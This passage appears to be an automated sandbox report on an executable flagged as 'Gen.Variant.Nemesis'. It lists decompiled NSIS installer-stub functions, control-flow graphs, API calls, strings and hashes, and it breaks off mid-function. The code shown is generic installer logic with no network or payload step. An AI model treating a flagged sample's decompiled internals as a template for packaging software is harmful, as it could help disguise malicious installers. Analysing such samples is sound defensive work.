                                  • GetClassInfoW.USER32 ref: 00403E4D
                                  • RegisterClassW.USER32 ref: 00403E56
                                  • DialogBoxParamW.USER32 ref: 00403E75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 1975747703-2935473529
                                  • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                  • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                  • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                  • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 389 403110-403127 388->389 391 403129 389->391 392 40312b-403134 call 4034cf 389->392 391->392 401 40325a-403262 call 403019 392->401 402 40313a-403141 392->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 405 403143-403157 call 405fe8 402->405 406 4031bd-4031c1 402->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069f7 411->418 417->389 425 4031ee 417->425 418->417 421->395 421->398 424->411 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->411 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->395 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                  C-Code - Quality: 80%
                                  			E0040307D(void* __eflags, signed int _a4) {
                                  				DWORD* _v8;
                                  				DWORD* _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				signed int _v44;
                                  				long _t43;
                                  				signed int _t50;
                                  				void* _t53;
                                  				void* _t57;
                                  				intOrPtr* _t59;
                                  				long _t60;
                                  				signed int _t65;
                                  				signed int _t70;
                                  				signed int _t71;
                                  				signed int _t77;
                                  				intOrPtr _t80;
                                  				long _t82;
                                  				signed int _t85;
                                  				signed int _t87;
                                  				void* _t89;
                                  				signed int _t90;
                                  				signed int _t93;
                                  				void* _t94;
                                  
                                  				_t82 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_t43 = GetTickCount();
                                  				_t91 = L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe";
                                  				 *0x434f0c = _t43 + 0x3e8;
                                  				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe", 0x400);
                                  				_t89 = E0040602D(_t91, 0x80000000, 3);
                                  				_v16 = _t89;
                                  				 *0x40a018 = _t89;
                                  				if(_t89 == 0xffffffff) {
                                  					return L"Error launching installer";
                                  				}
                                  				_t92 = L"C:\\Users\\jones\\Desktop";
                                  				E0040653D(L"C:\\Users\\jones\\Desktop", _t91);
                                  				E0040653D(0x444000, E00405E58(_t92));
                                  				_t50 = GetFileSize(_t89, 0);
                                  				__eflags = _t50;
                                  				 *0x42aa24 = _t50;
                                  				_t93 = _t50;
                                  				if(_t50 <= 0) {
                                  					L24:
                                  					E00403019(1);
                                  					__eflags =  *0x434f14 - _t82;
                                  					if( *0x434f14 == _t82) {
                                  						goto L29;
                                  					}
                                  					__eflags = _v8 - _t82;
                                  					if(_v8 == _t82) {
                                  						L28:
                                  						_t34 =  &_v24; // 0x40387d
                                  						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                  						_t94 = _t53;
                                  						E004034E5( *0x434f14 + 0x1c);
                                  						_t35 =  &_v24; // 0x40387d
                                  						_push( *_t35);
                                  						_push(_t94);
                                  						_push(_t82);
                                  						_push(0xffffffff); // executed
                                  						_t57 = E004032B4(); // executed
                                  						__eflags = _t57 - _v24;
                                  						if(_t57 == _v24) {
                                  							__eflags = _v44 & 0x00000001;
                                  							 *0x434f10 = _t94;
                                  							 *0x434f18 =  *_t94;
                                  							if((_v44 & 0x00000001) != 0) {
                                  								 *0x434f1c =  *0x434f1c + 1;
                                  								__eflags =  *0x434f1c;
                                  							}
                                  							_t40 = _t94 + 0x44; // 0x44
                                  							_t59 = _t40;
                                  							_t85 = 8;
                                  							do {
                                  								_t59 = _t59 - 8;
                                  								 *_t59 =  *_t59 + _t94;
                                  								_t85 = _t85 - 1;
                                  								__eflags = _t85;
                                  							} while (_t85 != 0);
                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                  							 *(_t94 + 0x3c) = _t60;
                                  							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						goto L29;
                                  					}
                                  					E004034E5( *0x41ea18);
                                  					_t65 = E004034CF( &_a4, 4);
                                  					__eflags = _t65;
                                  					if(_t65 == 0) {
                                  						goto L29;
                                  					}
                                  					__eflags = _v12 - _a4;
                                  					if(_v12 != _a4) {
                                  						goto L29;
                                  					}
                                  					goto L28;
                                  				} else {
                                  					do {
                                  						_t90 = _t93;
                                  						asm("sbb eax, eax");
                                  						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                  						__eflags = _t93 - _t70;
                                  						if(_t93 >= _t70) {
                                  							_t90 = _t70;
                                  						}
                                  						_t71 = E004034CF(0x416a18, _t90);
                                  						__eflags = _t71;
                                  						if(_t71 == 0) {
                                  							E00403019(1);
                                  							L29:
                                  							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                  						}
                                  						__eflags =  *0x434f14;
                                  						if( *0x434f14 != 0) {
                                  							__eflags = _a4 & 0x00000002;
                                  							if((_a4 & 0x00000002) == 0) {
                                  								E00403019(0);
                                  							}
                                  							goto L20;
                                  						}
                                  						E00405FE8( &_v44, 0x416a18, 0x1c);
                                  						_t77 = _v44;
                                  						__eflags = _t77 & 0xfffffff0;
                                  						if((_t77 & 0xfffffff0) != 0) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v40 - 0xdeadbeef;
                                  						if(_v40 != 0xdeadbeef) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v28 - 0x74736e49;
                                  						if(_v28 != 0x74736e49) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v32 - 0x74666f73;
                                  						if(_v32 != 0x74666f73) {
                                  							goto L20;
                                  						}
                                  						__eflags = _v36 - 0x6c6c754e;
                                  						if(_v36 != 0x6c6c754e) {
                                  							goto L20;
                                  						}
                                  						_a4 = _a4 | _t77;
                                  						_t87 =  *0x41ea18; // 0xf60c7
                                  						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                  						_t80 = _v20;
                                  						__eflags = _t80 - _t93;
                                  						 *0x434f14 = _t87;
                                  						if(_t80 > _t93) {
                                  							goto L29;
                                  						}
                                  						__eflags = _a4 & 0x00000008;
                                  						if((_a4 & 0x00000008) != 0) {
                                  							L16:
                                  							_v8 = _v8 + 1;
                                  							_t93 = _t80 - 4;
                                  							__eflags = _t90 - _t93;
                                  							if(_t90 > _t93) {
                                  								_t90 = _t93;
                                  							}
                                  							goto L20;
                                  						}
                                  						__eflags = _a4 & 0x00000004;
                                  						if((_a4 & 0x00000004) != 0) {
                                  							break;
                                  						}
                                  						goto L16;
                                  						L20:
                                  						__eflags = _t93 -  *0x42aa24; // 0xf60cb
                                  						if(__eflags < 0) {
                                  							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                  						}
                                  						 *0x41ea18 =  *0x41ea18 + _t90;
                                  						_t93 = _t93 - _t90;
                                  						__eflags = _t93;
                                  					} while (_t93 != 0);
                                  					_t82 = 0;
                                  					__eflags = 0;
                                  					goto L24;
                                  				}
                                  			}































                                  0x00403085
                                  0x00403088
                                  0x0040308b
                                  0x0040308e
                                  0x00403094
                                  0x004030a5
                                  0x004030aa
                                  0x004030bd
                                  0x004030c2
                                  0x004030c5
                                  0x004030cb
                                  0x00000000
                                  0x004030cd
                                  0x004030d8
                                  0x004030de
                                  0x004030ef
                                  0x004030f6
                                  0x004030fc
                                  0x004030fe
                                  0x00403103
                                  0x00403105
                                  0x004031f0
                                  0x004031f2
                                  0x004031f7
                                  0x004031fe
                                  0x00000000
                                  0x00000000
                                  0x00403200
                                  0x00403203
                                  0x00403227
                                  0x00403227
                                  0x0040322c
                                  0x00403232
                                  0x0040323d
                                  0x00403242
                                  0x00403242
                                  0x00403245
                                  0x00403246
                                  0x00403247
                                  0x00403249
                                  0x0040324e
                                  0x00403251
                                  0x00403264
                                  0x00403268
                                  0x00403270
                                  0x00403275
                                  0x00403277
                                  0x00403277
                                  0x00403277
                                  0x0040327f
                                  0x0040327f
                                  0x00403282
                                  0x00403283
                                  0x00403283
                                  0x00403286
                                  0x00403288
                                  0x00403288
                                  0x00403288
                                  0x00403292
                                  0x00403298
                                  0x004032a6
                                  0x004032ab
                                  0x00000000
                                  0x004032ab
                                  0x00000000
                                  0x00403251
                                  0x0040320b
                                  0x00403216
                                  0x0040321b
                                  0x0040321d
                                  0x00000000
                                  0x00000000
                                  0x00403222
                                  0x00403225
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040310b
                                  0x00403110
                                  0x00403115
                                  0x00403119
                                  0x00403120
                                  0x00403125
                                  0x00403127
                                  0x00403129
                                  0x00403129
                                  0x0040312d
                                  0x00403132
                                  0x00403134
                                  0x0040325c
                                  0x00403253
                                  0x00000000
                                  0x00403253
                                  0x0040313a
                                  0x00403141
                                  0x004031bd
                                  0x004031c1
                                  0x004031c5
                                  0x004031ca
                                  0x00000000
                                  0x004031c1
                                  0x0040314a
                                  0x0040314f
                                  0x00403152
                                  0x00403157
                                  0x00000000
                                  0x00000000
                                  0x00403159
                                  0x00403160
                                  0x00000000
                                  0x00000000
                                  0x00403162
                                  0x00403169
                                  0x00000000
                                  0x00000000
                                  0x0040316b
                                  0x00403172
                                  0x00000000
                                  0x00000000
                                  0x00403174
                                  0x0040317b
                                  0x00000000
                                  0x00000000
                                  0x0040317d
                                  0x00403183
                                  0x0040318c
                                  0x00403192
                                  0x00403195
                                  0x00403197
                                  0x0040319d
                                  0x00000000
                                  0x00000000
                                  0x004031a3
                                  0x004031a7
                                  0x004031af
                                  0x004031af
                                  0x004031b2
                                  0x004031b5
                                  0x004031b7
                                  0x004031b9
                                  0x004031b9
                                  0x00000000
                                  0x004031b7
                                  0x004031a9
                                  0x004031ad
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004031cb
                                  0x004031cb
                                  0x004031d1
                                  0x004031dd
                                  0x004031dd
                                  0x004031e0
                                  0x004031e6
                                  0x004031e6
                                  0x004031e6
                                  0x004031ee
                                  0x004031ee
                                  0x00000000
                                  0x004031ee

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0040308E
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                  • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                  • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                  • API String ID: 2803837635-1658914733
                                  • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                  • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                  • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                  • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 539 4034c2 526->539 527->526 532 403474-40347a 528->532 529->530 530->516 538 403388-403391 530->538 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 544 40348e-403493 call 4060df 536->544 541 403397-4033b7 call 406a65 538->541 539->524 548 403460-403462 541->548 549 4033bd-4033d0 GetTickCount 541->549 547 403498-40349a 544->547 550 403464-403466 547->550 551 40349c-4034a6 547->551 548->518 552 4033d2-4033da 549->552 553 40341b-40341d 549->553 550->518 551->532 554 4034a8 551->554 555 4033e2-403413 MulDiv wsprintfW call 40559f 552->555 556 4033dc-4033e0 552->556 557 403454-403458 553->557 558 40341f-403423 553->558 554->524 564 403418 555->564 556->553 556->555 557->525 559 40345e 557->559 561 403425-40342c call 4060df 558->561 562 40343a-403445 558->562 559->524 567 403431-403433 561->567 563 403448-40344c 562->563 563->541 566 403452 563->566 564->553 566->524 567->550 568 403435-403438 567->568 568->563
                                  C-Code - Quality: 95%
                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                  				signed int _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				intOrPtr _v24;
                                  				short _v152;
                                  				void* _t65;
                                  				void* _t69;
                                  				long _t70;
                                  				intOrPtr _t75;
                                  				long _t76;
                                  				void* _t78;
                                  				int _t88;
                                  				intOrPtr _t92;
                                  				intOrPtr _t95;
                                  				long _t96;
                                  				signed int _t97;
                                  				int _t98;
                                  				int _t99;
                                  				void* _t101;
                                  				void* _t102;
                                  
                                  				_t97 = _a16;
                                  				_t92 = _a12;
                                  				_v12 = _t97;
                                  				if(_t92 == 0) {
                                  					_v12 = 0x8000;
                                  				}
                                  				_v8 = _v8 & 0x00000000;
                                  				_v16 = _t92;
                                  				if(_t92 == 0) {
                                  					_v16 = 0x422a20;
                                  				}
                                  				_t62 = _a4;
                                  				if(_a4 >= 0) {
                                  					E004034E5( *0x434f58 + _t62);
                                  				}
                                  				if(E004034CF( &_a16, 4) == 0) {
                                  					L41:
                                  					_push(0xfffffffd);
                                  					goto L42;
                                  				} else {
                                  					if((_a19 & 0x00000080) == 0) {
                                  						if(_t92 != 0) {
                                  							if(_a16 < _t97) {
                                  								_t97 = _a16;
                                  							}
                                  							if(E004034CF(_t92, _t97) != 0) {
                                  								_v8 = _t97;
                                  								L44:
                                  								return _v8;
                                  							} else {
                                  								goto L41;
                                  							}
                                  						}
                                  						if(_a16 <= _t92) {
                                  							goto L44;
                                  						}
                                  						_t88 = _v12;
                                  						while(1) {
                                  							_t98 = _a16;
                                  							if(_a16 >= _t88) {
                                  								_t98 = _t88;
                                  							}
                                  							if(E004034CF(0x41ea20, _t98) == 0) {
                                  								goto L41;
                                  							}
                                  							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                  							if(_t69 == 0) {
                                  								L28:
                                  								_push(0xfffffffe);
                                  								L42:
                                  								_pop(_t65);
                                  								return _t65;
                                  							}
                                  							_v8 = _v8 + _t98;
                                  							_a16 = _a16 - _t98;
                                  							if(_a16 > 0) {
                                  								continue;
                                  							}
                                  							goto L44;
                                  						}
                                  						goto L41;
                                  					}
                                  					_t70 = GetTickCount();
                                  					 *0x40d384 =  *0x40d384 & 0x00000000;
                                  					 *0x40d380 =  *0x40d380 & 0x00000000;
                                  					_t14 =  &_a16;
                                  					 *_t14 = _a16 & 0x7fffffff;
                                  					_v20 = _t70;
                                  					 *0x40ce68 = 8;
                                  					 *0x416a10 = 0x40ea08;
                                  					 *0x416a0c = 0x40ea08;
                                  					 *0x416a08 = 0x416a08;
                                  					_a4 = _a16;
                                  					if( *_t14 <= 0) {
                                  						goto L44;
                                  					} else {
                                  						goto L9;
                                  					}
                                  					while(1) {
                                  						L9:
                                  						_t99 = 0x4000;
                                  						if(_a16 < 0x4000) {
                                  							_t99 = _a16;
                                  						}
                                  						if(E004034CF(0x41ea20, _t99) == 0) {
                                  							goto L41;
                                  						}
                                  						_a16 = _a16 - _t99;
                                  						 *0x40ce58 = 0x41ea20;
                                  						 *0x40ce5c = _t99;
                                  						while(1) {
                                  							_t95 = _v16;
                                  							 *0x40ce60 = _t95;
                                  							 *0x40ce64 = _v12;
                                  							_t75 = E00406A65(0x40ce58);
                                  							_v24 = _t75;
                                  							if(_t75 < 0) {
                                  								break;
                                  							}
                                  							_t101 =  *0x40ce60 - _t95;
                                  							_t76 = GetTickCount();
                                  							_t96 = _t76;
                                  							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                  								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                  								_t102 = _t102 + 0xc;
                                  								E0040559F(0,  &_v152); // executed
                                  								_v20 = _t96;
                                  							}
                                  							if(_t101 == 0) {
                                  								if(_a16 > 0) {
                                  									goto L9;
                                  								}
                                  								goto L44;
                                  							} else {
                                  								if(_a12 != 0) {
                                  									_v8 = _v8 + _t101;
                                  									_v12 = _v12 - _t101;
                                  									_v16 =  *0x40ce60;
                                  									L23:
                                  									if(_v24 != 1) {
                                  										continue;
                                  									}
                                  									goto L44;
                                  								}
                                  								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                  								if(_t78 == 0) {
                                  									goto L28;
                                  								}
                                  								_v8 = _v8 + _t101;
                                  								goto L23;
                                  							}
                                  						}
                                  						_push(0xfffffffc);
                                  						goto L42;
                                  					}
                                  					goto L41;
                                  				}
                                  			}
























                                  0x004032bf
                                  0x004032c3
                                  0x004032c6
                                  0x004032cb
                                  0x004032cd
                                  0x004032cd
                                  0x004032d4
                                  0x004032d8
                                  0x004032dd
                                  0x004032df
                                  0x004032df
                                  0x004032e6
                                  0x004032eb
                                  0x004032f6
                                  0x004032f6
                                  0x00403308
                                  0x004034bd
                                  0x004034bd
                                  0x00000000
                                  0x0040330e
                                  0x00403312
                                  0x0040346a
                                  0x004034ad
                                  0x004034af
                                  0x004034af
                                  0x004034bb
                                  0x004034c2
                                  0x004034c5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004034bb
                                  0x0040346f
                                  0x00000000
                                  0x00000000
                                  0x00403471
                                  0x00403474
                                  0x00403477
                                  0x0040347a
                                  0x0040347c
                                  0x0040347c
                                  0x0040348c
                                  0x00000000
                                  0x00000000
                                  0x00403493
                                  0x0040349a
                                  0x00403464
                                  0x00403464
                                  0x004034bf
                                  0x004034bf
                                  0x00000000
                                  0x004034bf
                                  0x0040349c
                                  0x0040349f
                                  0x004034a6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004034a8
                                  0x00000000
                                  0x00403474
                                  0x0040331e
                                  0x00403320
                                  0x00403327
                                  0x0040332e
                                  0x0040332e
                                  0x00403335
                                  0x0040333d
                                  0x00403347
                                  0x0040334c
                                  0x00403354
                                  0x0040335e
                                  0x00403361
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403367
                                  0x00403367
                                  0x00403367
                                  0x0040336f
                                  0x00403371
                                  0x00403371
                                  0x00403382
                                  0x00000000
                                  0x00000000
                                  0x00403388
                                  0x0040338b
                                  0x00403391
                                  0x00403397
                                  0x00403397
                                  0x004033a2
                                  0x004033a8
                                  0x004033ad
                                  0x004033b4
                                  0x004033b7
                                  0x00000000
                                  0x00000000
                                  0x004033c3
                                  0x004033c5
                                  0x004033ce
                                  0x004033d0
                                  0x00403401
                                  0x00403407
                                  0x00403413
                                  0x00403418
                                  0x00403418
                                  0x0040341d
                                  0x00403458
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040341f
                                  0x00403423
                                  0x0040343f
                                  0x00403442
                                  0x00403445
                                  0x00403448
                                  0x0040344c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403452
                                  0x0040342c
                                  0x00403433
                                  0x00000000
                                  0x00000000
                                  0x00403435
                                  0x00000000
                                  0x00403435
                                  0x0040341d
                                  0x00403460
                                  0x00000000
                                  0x00403460
                                  0x00000000
                                  0x00403367

                                  APIs
                                  Strings
                                  • }8@, xrefs: 004032B4
                                  • A, xrefs: 00403374
                                  • ... %d%%, xrefs: 004033FB
                                  • *B, xrefs: 004032DF
                                  • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.66015, xrefs: 00403338
                                  • A, xrefs: 0040347E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: *B$ A$ A$... %d%%$<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.66015$}8@
                                  • API String ID: 551687249-2487974866
                                  • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                  • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                  • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                  • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 581 4017b5-4017b6 call 4067c4 574->581 575->581 584 4017bb-4017bf 581->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 594 4017dd-4017ef 585->594 595 4017cd-4017db CompareFileTime 585->595 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 594->586 595->594 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 633 401864-401865 598->633 609 401882-401888 599->609 613 402c33 609->613 611->612 615 4018d0-4018db FindCloseChangeNotification 611->615 612->615 617 402c35-402c39 613->617 618 4018e1-4018e4 615->618 619 402c2a-402c2d 615->619 621 4018e6-4018f7 call 40657a lstrcatW 618->621 622 4018f9-4018fc call 40657a 618->622 619->613 627 401901-402398 621->627 622->627 631 40239d-4023a2 627->631 632 402398 call 405b9d 627->632 631->617 632->631 633->609 634 401867-401868 633->634 634->599
                                  C-Code - Quality: 75%
                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                  				void* __esi;
                                  				void* _t35;
                                  				void* _t43;
                                  				void* _t45;
                                  				FILETIME* _t51;
                                  				FILETIME* _t64;
                                  				void* _t66;
